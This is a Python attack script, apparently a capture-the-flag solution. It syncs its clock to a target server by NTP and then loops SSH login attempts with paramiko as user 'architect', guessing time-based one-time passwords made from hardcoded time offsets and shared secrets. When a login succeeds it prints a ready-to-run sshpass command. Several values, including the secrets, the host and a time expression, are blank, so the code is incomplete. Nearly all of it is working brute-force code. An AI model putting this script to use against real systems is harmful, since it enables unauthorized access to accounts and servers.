from datetime import datetime, timedelta import time import subprocess from hashlib import sha256 import random import sys import paramiko from time import ctime import ntplib import time import os #shared secret token for OTP calculation sharedSecret1 = sharedSecret2 = sharedSecret3 = USER = "architect" RHOST = try: import ntplib client = ntplib.NTPClient() response = client.request(RHOST) #IP of linux-bay server print(response) os.system('date ' + time.strftime('%m%d%H%M%Y.%S',time.localtime(response.tx_time))) except: print('Could not sync with time server.') sys.exit() print('\nTime Sync Completed Successfully.\nConducting brute-force on OTP\n') secretList = [sharedSecret1, sharedSecret2, sharedSecret3] def TimeSet(country, hours, mins, seconds): now = + timedelta(hours=hours, minutes=mins) CurrentTime = int(now.strftime("%d%H%M")) return(CurrentTime) def getRandom(): ca = TimeSet('Ukraine', 4, 43, 1) cb = TimeSet('Germany', 13, 55, 0) cc = TimeSet('England', 9, 19, 1) cd = TimeSet('Nigeria', 1, 6, 1) ce = TimeSet('Denmark', -5, 18, 1) timeSetList = [ca, cb, cc, cd, ce] randomTimeSet = random.sample(timeSetList, 3) ctt = randomTimeSet[0] * randomTimeSet[1] * randomTimeSet[2] uc = ctt ^ random.choice(secretList) hc = (sha256(repr(uc).encode('utf-8')).hexdigest()) t = hc[22:44] print(t) return t while True: OTP = getRandom() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(RHOST, username=USER, password=OTP) print(f"Success with: {OTP}\n") #OTP = bytes(str(OTP), encoding='utf-8') #RHOST = bytes(str(RHOST), encoding='utf-8') #output = subprocess.getoutput(f'gnome-terminal -x bash -c "sshpass -p {OTP} ssh {USER}@{RHOST}"') #exec(output) print(f"Execute this command: sshpass -p \'{OTP}\' ssh architect@{RHOST}\n\n You have 60 seconds or less to run this command.") sys.exit() except Exception as ex: print(f"Connection failed with: {OTP}, trying again\n") continue